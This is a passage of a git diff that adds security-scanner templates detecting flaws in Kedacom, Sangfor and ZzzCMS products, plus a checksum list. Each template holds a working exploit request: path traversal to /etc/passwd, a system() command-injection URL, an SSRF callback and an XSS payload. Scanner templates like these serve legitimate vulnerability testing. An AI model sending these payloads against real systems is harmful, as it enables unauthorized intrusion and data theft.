https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E7%A7%91%E8%BE%BE%20%E7%BD%91%E7%BB%9C%E9%94%AE%E7%9B%98%E6%8E%A7%E5%88%B6%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + fofa-query: "网络键盘控制台" + tags: lfi,kedacom,network + +http: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "text/html" + - "Server: kedacom-hs" + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/sangfor-cphp-rce.yaml b/http/vulnerabilities/other/sangfor-cphp-rce.yaml new file mode 100644 index 0000000000..82bbf2c6cc --- /dev/null +++ b/http/vulnerabilities/other/sangfor-cphp-rce.yaml @@ -0,0 +1,31 @@ +id: sangfor-cphp-rce + +info: + name: Sangfor Log Center - Remote Command Execution + author: DhiyaneshDk + severity: critical + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?plain=1 + metadata: + max-request: 1 + verified: true + fofa-query: "isHighPerformance : !!SFIsHighPerformance" + tags: sangfor,rce + +http: + - method: GET + path: + - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=ipconfig" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Windows IP" + - "Log Helper" + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/sangfor-download-lfi.yaml b/http/vulnerabilities/other/sangfor-download-lfi.yaml new file mode 100644 index 0000000000..cd7109ea4a --- /dev/null +++ b/http/vulnerabilities/other/sangfor-download-lfi.yaml @@ -0,0 +1,38 @@ +id: sangfor-download-lfi + +info: + name: Sangfor Application download.php - Arbitary File Read + author: DhiyaneshDk + severity: high + description: | + There is an arbitrary file reading vulnerability in the Sangfor Application download.php. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E6%8A%A5%E8%A1%A8%E7%B3%BB%E7%BB%9F%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md?plain=1 + metadata: + max-request: 1 + fofa-query: app="SANGFOR-应用交付报表系统" + verified: true + tags: lfi,sangfor + +http: + - method: GET + path: + - '{{BaseURL}}/report/download.php?pdf=../../../../../etc/passwd' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: header + words: + - application/force-download + - 'filename="passwd"' + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/sangfor-sysuser-conf.yaml b/http/vulnerabilities/other/sangfor-sysuser-conf.yaml new file mode 100644 index 0000000000..9991923c15 --- /dev/null +++ b/http/vulnerabilities/other/sangfor-sysuser-conf.yaml @@ -0,0 +1,34 @@ +id: sangfor-sysuser-conf + +info: + name: Sangfor Application sys_user.conf Account Password Leakage + author: DhiyaneshDk + severity: high + description: | + Sangfor application delivery management system file sys_user.conf can be directly accessed without authorization, resulting in leakage of account and password + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20sys_user.conf%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + - https://github.com/achuna33/MYExploit/blob/master/src/main/java/com/achuna33/Controllers/SangForController.java + metadata: + max-request: 1 + fofa-query: app="SANGFOR-应用交付管理系统" + tags: lfi,sangfor,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/tmp/updateme/sinfor/ad/sys/sys_user.conf" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "true" + - "admin" + - "密码" + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml new file mode 100644 index 0000000000..dcb8294680 --- /dev/null +++ b/http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml @@ -0,0 +1,40 @@ +id: zzzcms-info-disclosure + +info: + name: Zzzcms 1.75 - Information Disclosure + author: ritikchaddha + severity: low + description: | + There is a rather strange file that directly echoes some content belonging to the inaccessible zzz_config.php. The information leakage file is located in plugins\webuploader\js\webconfig.php, and the management path name of the management background can be obtained directly. No need to blast admin and add 3 digits anymore + reference: + - https://xz.aliyun.com/t/7414 + metadata: + max-request: 1 + verified: true + shodan-query: html:"ZzzCMS" + fofa-query: title="ZzzCMS" + tags: zzzcms,info,disclosure + +http: + - raw: + - | + GET /plugins/webuploader/js/webconfig.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'var adminpath' + - 'var imageMaxSize=' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml new file mode 100644 index 0000000000..2f09159dc7 --- /dev/null +++ b/http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml @@ -0,0 +1,44 @@ +id: zzzcms-ssrf + +info: + name: ZzzCMS 1.75 - Server-Side Request Forgery + author: ritikchaddha + severity: high + reference: + - https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html + metadata: + max-request: 1 + verified: true + shodan-query: html:"ZzzCMS" + fofa-query: title="ZzzCMS" + tags: zzzcms,ssrf,oast + +variables: + filename: "{{to_lower(rand_text_alpha(4))}}" + +http: + - raw: + - | + POST /plugins/ueditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + source[0]=http://{{interactsh-url}}/{{filename}}.txt + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: body + words: + - '{"state":' + - 'list":' + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/zzzcms/zzzcms-xss.yaml b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml new file mode 100644 index 0000000000..d12dabddfb --- /dev/null +++ b/http/vulnerabilities/zzzcms/zzzcms-xss.yaml @@ -0,0 +1,38 @@ +id: zzzcms-xss + +info: + name: Zzzcms 1.75 - Cross-Site Scripting + author: ritikchaddha + severity: medium + reference: + - https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.75%20xss%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + shodan-query: html:"ZzzCMS" + fofa-query: title="ZzzCMS" + tags: zzzcms,xss + +http: + - raw: + - | + GET /plugins/template/login.php?backurl=1%20onmouseover%3dalert(/document.domain/)%20y%3d HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onmouseover=alert(/d0cument.domain/) y=&act' + - 'document.write("' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/templates-checksum.txt b/templates-checksum.txt index ed898d18b1..727ad9b704 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,13 +8,13 @@ TEMPLATES-STATS.json:ea5d804cf72b5c14a93f78cdf90cf17abc32b1cb TEMPLATES-STATS.md:c820a18f1939ff427af10e4af970c402c296455a TOP-10.md:6fe06f1553578f1529be11eabd647cae757d6845 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:ac52aa87c237f61a666ac4d63388666a12905bc4 -cves.json-checksum.txt:c0b52889cdfd6f7577621fa51d5f2c5390387fb9 +cves.json:15592696933c38be6c207f2ecba944229dd21b16 +cves.json-checksum.txt:da8d536595f225133b92d3e01f6ee77b08c1b250 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c dns/dmarc-detect.yaml:d6d23a8837c5ec3809ffa2d407a72fdc7a071671 -dns/dns-saas-service-detection.yaml:07487ee1995207541f4fdbc8a226f7f71242dccb +dns/dns-saas-service-detection.yaml:b8e5a37cc3e5fcdeb3ec3a742b8bc81babf5c302 dns/dns-waf-detect.yaml:f4d80afe7d48cee91123294482cd63cadeaa943d dns/dnssec-detection.yaml:6dd2e7d114f3be862e2f1e87f5d2d2c4de1bf08a dns/ec2-detection.yaml:01823f3399c471516137b067f37f5c6661ae3099 @@ -198,6 +198,117 @@ file/logs/python-app-sql-exceptions.yaml:7dc14b83b6bf6cfa63af6a1ea1739a02d9b8394 file/logs/ruby-on-rails-framework-exceptions.yaml:4cacd8d7144f8353b5927cac2d008c1d08bb3a50 file/logs/spring-framework-exceptions.yaml:59912aa3db6ff6d29783c9b4fd84a6dc4d8369f3 file/logs/suspicious-sql-error-messages.yaml:2e4c653f2d2012480e5fcd8f964c114e5a26e5a9 +file/malware/aar-malware.yaml:d02484c0b5bdc45733e8b2b19aeabf9d657c302a +file/malware/adzok-malware.yaml:ca6ec1ec509d1d3c81011fbd3b630bbc7880ae55 +file/malware/alfa-malware.yaml:8cb0da69ead8bd22e571734bc151c457f9f872fa +file/malware/alienspy-malware.yaml:58d0fccdc36f1d4134a3dff08444b74cfcc0b59a +file/malware/alina-malware.yaml:52d6d65a8d1a1cf27196dfbc549dfd7f4fa55088 +file/malware/alpha-malware.yaml:deaa68b7bf389e5022974def29e2ea1b006b9d80 +file/malware/andromeda-malware.yaml:b29e1a1751fa9ce222432207b77bc653d5286dde +file/malware/ap0calypse-malware.yaml:303b2c9fd6bae874c938d9d82527030bf249b111 +file/malware/arcom-malware.yaml:dc21540baf89192cbd26a45bef22c2fe240f4c4e +file/malware/arkei-malware.yaml:0efaa17826e99b688392cb21ceb65a9a3b84cda7 +file/malware/backoff-malware.yaml:97ce2ec738d3f5367dd76f66ac70af985d8e87fe +file/malware/bandook-malware.yaml:f8fcacb4072655713a29870400a1d3f3151903f5 +file/malware/blacknix-malware.yaml:dae2774112cbcb5185603cf6c074ffdcc48c7b43 +file/malware/blackworm-malware.yaml:a0d97ac2b0cde1837623b87411062008f4877299 +file/malware/bluebanana-malware.yaml:470f563a54ad024e47854d3e84a996077dfc386b +file/malware/bozok-malware.yaml:89cfa4b2cea3806302111197f5daa3bf8d97101f +file/malware/bublik-malware.yaml:b66d16da3c8f819d2b6f91060a4b6996345554d1 +file/malware/cap-hookexkeylogger-malware.yaml:2a355e5571b866db18ada408054e8d0208f04887 +file/malware/cerberus-malware.yaml:25a25bbad74d014c6a917dee037b4302cba3dae1 +file/malware/clientmesh-malware.yaml:ba9152040a38449e2aa1dd5f26ac2c177f983e50 +file/malware/crimson-malware.yaml:bddbde813ac3d2f859affce571a6f9383e886ea1 +file/malware/cryptxxx-dropper-malware.yaml:e974652e29d8fcff19cfb18ba41440103fee8edd +file/malware/cryptxxx-malware.yaml:54778ab5c5f377c734f4382038003a65755063f4 +file/malware/cxpid-malware.yaml:6e98a2f82eb04aca3bf1216fedda822f4d56aba3 +file/malware/cythosia-malware.yaml:a9f4ff854507f36ea0cb853c7db1696ef926c16d +file/malware/darkrat-malware.yaml:b3dfa3e687050f3800e37bdcf053b64090f57dac +file/malware/ddostf-malware.yaml:72736a5e925f48613fb7be991b0d0e78cc30d8f0 +file/malware/derkziel-malware.yaml:14bbea26ab6cb272abbc6e57028c34b1b5fffc59 +file/malware/dexter-malware.yaml:21e72e7de717000f132174c4c3bd21d36f15c1ff +file/malware/diamondfox-malware.yaml:86c81b433f858b3395fe2187d93a688e12c7bb22 +file/malware/dmalocker-malware.yaml:675ef7c0e17e4c1e605bc0e306418b03e69a5e6d +file/malware/doublepulsar-malware.yaml:6bce78fb4d9f9a8f154c1bd67b86acac40d00374 +file/malware/eicar-malware.yaml:9fa490ad507ca2e008360f323518aa8c8a697632 +file/malware/erebus-malware.yaml:838f69db4458e97ec110b28bf1fedc48264470a4 +file/malware/ezcob-malware.yaml:caba2c2501d8bb999493ace4b62299b29e2edd40 +file/malware/fudcrypt-malware.yaml:606f00c1c3d53704b9bb22d5cdd1d87759c6c77b +file/malware/gafgyt-bash-malware.yaml:173d7cf67c3bb313c675c78f244ead4ea18819a3 +file/malware/gafgyt-generic-malware.yaml:6d93186cda54db0a1710de21831ac71fd5c3c0f7 +file/malware/gafgyt-hihi-malware.yaml:e0bdb54bc7784796b68175ff44e4ec662fde5790 +file/malware/gafgyt-hoho-malware.yaml:ae7dc3a2ef3a921f0df168f98d3174bb377b1507 +file/malware/gafgyt-jackmy-malware.yaml:81e7ece5aa3224af625e558851204614429d634f +file/malware/gafgyt-oh-malware.yaml:93ad09ab5a64831619780c326a8722ab22c8c812 +file/malware/genome-malware.yaml:a7b584dfb190c237d0dd386a72dc42ca1df817e5 +file/malware/glass-malware.yaml:307fb0eeee3f193d850b80f9a2cdd185d8c2d462 +file/malware/glasses-malware.yaml:26c99bfd1f68643de6fffffd1e4ee8fd33b25334 +file/malware/gozi-malware.yaml:651fe3c2635363da20645f0554580aa308519db0 +file/malware/gpgqwerty-malware.yaml:f5fe50a60148ce35aaa9640a8e89d8273bdefe4b +file/malware/greame-malware.yaml:1a0ffb8c7a6e26c3f309d30466543fdc54e01649 +file/malware/grozlex-malware.yaml:49225c117d561fa7e43f37e4477d6d52ff17c983 +file/malware/hawkeye-malware.yaml:8b229438d26e450a318d52240fda05bf7caa4f12 +file/malware/imminent-malware.yaml:c92c332b6ba8e746068095771a4eeee4b84dee27 +file/malware/infinity-malware.yaml:d04c82aa2d333c15b08b3abffe8192a3e6bfbc1a +file/malware/insta11-malware.yaml:1270e9e29633db417e00ef5a9839a924c6bf0c3a +file/malware/intel-virtualization-malware.yaml:9215be19b1724696481fbd4534d903362547fa4f +file/malware/iotreaper-malware.yaml:ba9d17fc203a5ba6e2c273a3a15226a82614d902 +file/malware/linux-aesddos-malware.yaml:beb18c783a37d793207506326e679a09f6f08245 +file/malware/linux-billgates-malware.yaml:5e6990833085af09972c2c7e63dc0c69eb8f7a3b +file/malware/linux-elknot-malware.yaml:0f301a5c7a1649d92b3723f8596c254a29f2740e +file/malware/linux-mrblack-malware.yaml:c97e96acd11fa56c9f7fcc983ef0a830f6bce5d5 +file/malware/linux-tsunami-malware.yaml:725ff72dbe45be12f34663b66dbfdfb02edb9882 +file/malware/locky-malware.yaml:87753bb0e54b23b39c98cd8e1abfeb2701e15960 +file/malware/lostdoor-malware.yaml:57426eaf178c792223424ccc453b47a835295530 +file/malware/luminositylink-malware.yaml:061340d0aae55fda08bfdd1991e725d40ec611aa +file/malware/luxnet-malware.yaml:d954dfa7260c310dd5692adf7761dbb0585dcd89 +file/malware/macgyver-installer-malware.yaml:40fd5a41d1bfc4322e742fca86b41d75ede9a25b +file/malware/macgyver-malware.yaml:17d1497a42e425d96c2194ecd5b3e73ab43a04d2 +file/malware/madness-malware.yaml:844be25dbdca4a5fe759e9f423e886de0642bbdd +file/malware/miner--malware.yaml:3aafffaaf38c9bf153017e14d16a22ff914b1ac4 +file/malware/miniasp3-malware.yaml:1eb66ccf6661ee7a0947e7ff0094ead8a8ab6123 +file/malware/naikon-malware.yaml:97a1d9720cd78f4c6a18b7e030bef2ba3045dfca +file/malware/naspyupdate-malware.yaml:8831d92d923bc433add0a7960659204482161e8d +file/malware/notepad-malware.yaml:044bcb34935c966a6022da346f1c15773872ed73 +file/malware/olyx-malware.yaml:c5e5dc3708b09acfe8c307745a887920469aca25 +file/malware/osx-leverage-malware.yaml:46a803f0a5861789bfdd2e83ceb86f94fa80afd0 +file/malware/paradox-malware.yaml:dd7bdf7c0f70de79f683f08dd6619c2d6244ad46 +file/malware/plasma-malware.yaml:d7da17c7f6b10c3d963f58301b1c33d76e703ac2 +file/malware/poetrat-malware.yaml:7641ae53f0beb1d248e3215bb9edf0699298f344 +file/malware/pony-malware.yaml:84a29caf8c967d7a85f1ec3f9310126f4b3b6831 +file/malware/pubsab-malware.yaml:ee11be2ea23f1906682915b66c4581c0012d689d +file/malware/punisher-malware.yaml:0cd260b236d782eaee191a02bf9b7f1a010f543d +file/malware/pypi-malware.yaml:671af8b396e9c8469d87758ffdd10aa682ede40d +file/malware/pythorat-malware.yaml:0103fa4abb06a5b8b367670a083be084dea90048 +file/malware/qrat-malware.yaml:19f53a81c34327e21b3ed582a5cb01451c157b83 +file/malware/satana-dropper-malware.yaml:e63ab254aa3f1855b6c26967b594f9d8cf3a82d8 +file/malware/satana-malware.yaml:8e8da91b2c5c4fecdbce8df7bc95f0c76462e06f +file/malware/shimrat-malware.yaml:c5799bcdcecef37d10ea9e741bf81516c2d42d21 +file/malware/shimratreporter-malware.yaml:6e638d6a948fd3c7de3dcfb3445b948fb0e866c7 +file/malware/sigma-malware.yaml:c5c954713debaa83c0db44d08295bc57e411a096 +file/malware/smallnet-malware.yaml:e251ca064cea0b844a5b6f35f2494ce052d008f9 +file/malware/snake-malware.yaml:694580d182e2ca4a9d54d5f941599b057c4b34ce +file/malware/sub7nation-malware.yaml:d71ddfd6d8942907cb8fd3c9863d01a588f8043d +file/malware/t5000-malware.yaml:c0e654d311cc90d07a5c0108d3a864b11529a982 +file/malware/tedroo-malware.yaml:02923f9328241d6f41b1cf525f03ab7589dad7fd +file/malware/terminator-malware.yaml:d0f1608f784ca8fd02e2b8ec848d0234211cbb7e +file/malware/teslacrypt-malware.yaml:5e562bc0925622c8f36e2b9b11e3bd2884af1cd8 +file/malware/tox-malware.yaml:91590ae502a4dd2b1013a5a0ce325f584550f3d3 +file/malware/treasurehunt-malware.yaml:6333ad52929847e2aa0afaf8a1310519b532937a +file/malware/trickbot-malware.yaml:4062f86b7c518344dea7f66e1bb852807503262c +file/malware/trumpbot-malware.yaml:a491065b415c12ecf7985ebb7b7537a2c5c94f31 +file/malware/universal-1337-malware.yaml:b7490cf01942ec8b91ce0918890b2345c9c2ae38 +file/malware/unrecom-malware.yaml:a9b4d2a500c926f822e48db075735b0ac5db3b0a +file/malware/urausy-malware.yaml:a56e2743aec670bd172c946a18908703ba2dec7f +file/malware/vertex-malware.yaml:ac3afeb14a1dba663914f52a6b79e8f1d5d620be +file/malware/virusrat-malware.yaml:8c86975e41259776e49fae31a196ce216080fb93 +file/malware/wabot-malware.yaml:f99093842e2acf3cd1b772971abddf4ec31f3d0e +file/malware/warp-malware.yaml:aee46d47a73601fbe245a690b8095a9b8ea60ac9 +file/malware/xhide-malware.yaml:acdf0229aece896e3c4416c6524ca6b93949fcd9 +file/malware/xor-ddos-malware.yaml:dc69bca629a51dd6e23216043e7841dec6ce08fa +file/malware/yayih-malware.yaml:805f7343ac975a91a1572ca4629e4fa9638070e0 +file/malware/zeghost-malware.yaml:19400d9592f9bd59fbc8667f062570c861487c3d +file/malware/zoxpng-malware.yaml:833924a57059d6b7ffa5fc354816ea2f914e0b97 file/nodejs/admzip-path-overwrite.yaml:3f7f79845877828f87e72b81326e6a90049bd8ea file/nodejs/express-lfr.yaml:cec2babe3b1d46416ec358ed00a5cea450531c13 file/nodejs/generic-path-traversal.yaml:49895d260bb6da86bd36dde6553265963cc62db0 @@ -240,12 +351,12 @@ helpers/wordpress/plugins/ad-inserter.txt:38bc2a6cfb847a70c262d12fd6603606363254 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/admin-menu-editor.txt:4572917cbde34e4ba98ab9a65059efd81be6594b helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df -helpers/wordpress/plugins/advanced-custom-fields.txt:ffc1feb775249e46c0a2c4c8c83174ca4d2a125e +helpers/wordpress/plugins/advanced-custom-fields.txt:08601881a118badedde20b726e52078f3318fba1 helpers/wordpress/plugins/akismet.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f -helpers/wordpress/plugins/all-in-one-seo-pack.txt:82ad50ca4cbd63a3f83ddbd28315b55b52f600fb +helpers/wordpress/plugins/all-in-one-seo-pack.txt:68a50e98458a9c28886ed15ffb2cc666b2d3d49b helpers/wordpress/plugins/all-in-one-wp-migration.txt:9c43220fa09b15d375ba7679041d0bd2e22746b8 -helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:49911098f5af8acdff20786f92ff5e717cf35906 +helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:ba99f9ee25995f984c5e6c79172400eaf52edbaa helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57 helpers/wordpress/plugins/antispam-bee.txt:b91ff026739750b181b34969295fb93cf8fdc898 helpers/wordpress/plugins/astra-sites.txt:3a8e01bbd716628be7b89f1ec085442592846654 @@ -269,7 +380,7 @@ helpers/wordpress/plugins/code-snippets.txt:fbc954f986ea78ee55f14e1ee288f60983e4 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:6edccbf589807e4171353b69b32d148fb22948d3 helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/contact-form-7.txt:aa016b2fe9e1d5ec44a206b16f237f748a306395 +helpers/wordpress/plugins/contact-form-7.txt:77526ddfb1469f41739fcab554059141c36d9329 helpers/wordpress/plugins/contact-form-cfdb7.txt:456a1b2970af52d0b32db52b0683f87df6c6e06c helpers/wordpress/plugins/cookie-law-info.txt:8b06ddb10d32fd00c6f396f4696592af976b2118 helpers/wordpress/plugins/cookie-notice.txt:8599c5904510bf3031da09a62f0802bc300e964e @@ -292,7 +403,7 @@ helpers/wordpress/plugins/elementor.txt:664c4c547c02ee1e3a770bdf2fc99f33b46ffa42 helpers/wordpress/plugins/elementskit-lite.txt:35fd2c7ac7c4486ea481738632d2b2188a5e0917 helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 -helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:d1c111ea61a3a6d959d6d130490baf4705c44dee +helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:33b70bd6d25d500ed8be7286bcefff3df64d27b1 helpers/wordpress/plugins/ewww-image-optimizer.txt:3eebc7c9c53af6e2c8a91094b656f824a4b7150b helpers/wordpress/plugins/facebook-for-woocommerce.txt:56f36dae4913c52f18de86fa71feb54d31fb1f77 helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614 @@ -304,12 +415,12 @@ helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb82272 helpers/wordpress/plugins/formidable.txt:f96eaecad7005b860741ecc59d4835f7428015fd helpers/wordpress/plugins/forminator.txt:5a13f9241243c2d9d28367028c116b0cf92f566d helpers/wordpress/plugins/ga-google-analytics.txt:48c07757afb07916aaceb81724ecfe2e17de1bc9 -helpers/wordpress/plugins/gdpr-cookie-compliance.txt:0b029e20735269b8d97357faa7e020b378eb41c8 +helpers/wordpress/plugins/gdpr-cookie-compliance.txt:468c943991a0608d57031fc177f82d41b494e72a helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:072a88924070c3f9a7f0bcc0bd504dcee9db878b helpers/wordpress/plugins/google-analytics-for-wordpress.txt:0a156a8d62cb442177dbc6af4c27a04bd7d19a70 helpers/wordpress/plugins/google-listings-and-ads.txt:317ed41a757a4ad0ce808afd99dbc4ec974d9991 helpers/wordpress/plugins/google-site-kit.txt:2bdab5af2a03ca19e7d7e36e5d1120a08c5bfc5b -helpers/wordpress/plugins/google-sitemap-generator.txt:32cb3486704c3d1ac786316411e5d97ab281fea2 +helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61 helpers/wordpress/plugins/gtranslate.txt:02aeb4dd00e9c0bb1104a19a9856dc679709da62 helpers/wordpress/plugins/gutenberg.txt:436e574867e719c08a75ff683536950ca3040098 helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf @@ -317,7 +428,7 @@ helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b helpers/wordpress/plugins/header-footer-code-manager.txt:c2e02b33da3f80da726e9cf198552626bb5042e8 helpers/wordpress/plugins/header-footer-elementor.txt:a9510f9e42b212b735a604c279959b616f8ddd5a helpers/wordpress/plugins/header-footer.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 -helpers/wordpress/plugins/health-check.txt:40e124dcbde01bd9224f2d58906f34c83d1441ae +helpers/wordpress/plugins/health-check.txt:9b80ca131fbc6cb5a944359bf46b2f5f301b25fc helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb01716 helpers/wordpress/plugins/host-webfonts-local.txt:01ac9a64a711d9d1b7130e24a92eb95b0850c705 helpers/wordpress/plugins/imagify.txt:d24fa45ca77f079cc359c97272276969e6aead2c @@ -328,8 +439,8 @@ helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa86 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 helpers/wordpress/plugins/jetpack-boost.txt:f7ca6a21d278eb5ce64611aadbdb77ef1511d3dd helpers/wordpress/plugins/jetpack.txt:afd55b1155942508618aaeac51195339624a510c -helpers/wordpress/plugins/kadence-blocks.txt:e533a0ddf49ac25eb565f7786d75249e411bd53a -helpers/wordpress/plugins/kirki.txt:2cbc97154c127c59a298a4207a147a2fff01b48f +helpers/wordpress/plugins/kadence-blocks.txt:deccc3cf363403cddb880388388bf192fbcfd655 +helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa helpers/wordpress/plugins/leadin.txt:f8eabd3f57e988795ca00df88696aefb639b9afc helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:d4dbf56812ab4702a984154c87a3e904d467f063 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 @@ -342,7 +453,7 @@ helpers/wordpress/plugins/mailchimp-for-wp.txt:2bf65a0d95209c8002516a0a1d50958c3 helpers/wordpress/plugins/mailpoet.txt:70513ebb6b872e4203eb826ee4aabf0e430266a8 helpers/wordpress/plugins/maintenance.txt:254b136ca21ea7ce53096fd367ddb29c22a7cce9 helpers/wordpress/plugins/mainwp-child.txt:980feb4697a9a59378889074eb2a9c667eb85231 -helpers/wordpress/plugins/malcare-security.txt:d4d296df9c7bfc07d0bc5adb18ee49bef62495cd +helpers/wordpress/plugins/malcare-security.txt:5d8ff3e1d64162e6d335ec7d6b824be075a058dd helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/meta-box.txt:57efd6c9af996d49184c10d2eb37abea3ad4614c @@ -356,18 +467,18 @@ helpers/wordpress/plugins/official-facebook-pixel.txt:ae0028333ce6fece2c0f57bd10 helpers/wordpress/plugins/one-click-demo-import.txt:7c49f6117c3f09ee90548ad70960b7a9b716deb8 helpers/wordpress/plugins/optinmonster.txt:43d658fcb5e8bd6cac245dd878e485a7651c9a4f helpers/wordpress/plugins/otter-blocks.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/password-protected.txt:bab6135b6f4ed36108f0a960f3b099b81315d000 +helpers/wordpress/plugins/password-protected.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606 helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 helpers/wordpress/plugins/photo-gallery.txt:08a174cc900680a65f258ba7bfefa6157041f4a4 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 -helpers/wordpress/plugins/pixelyoursite.txt:c6043029d8fee3b06ca3583c71e935a8241c7323 +helpers/wordpress/plugins/pixelyoursite.txt:2ab2f5b3508905fb476f1227adb86c8b4de8ccf3 helpers/wordpress/plugins/polylang.txt:d8521792e123691f48a1df559885c477069c6c1d helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe helpers/wordpress/plugins/post-smtp.txt:a53d438c54d64bd5c96a8f6f3294569e50329234 helpers/wordpress/plugins/post-types-order.txt:ccc7f2bf6d0604d86f3d33a12b75411b311e9dfe 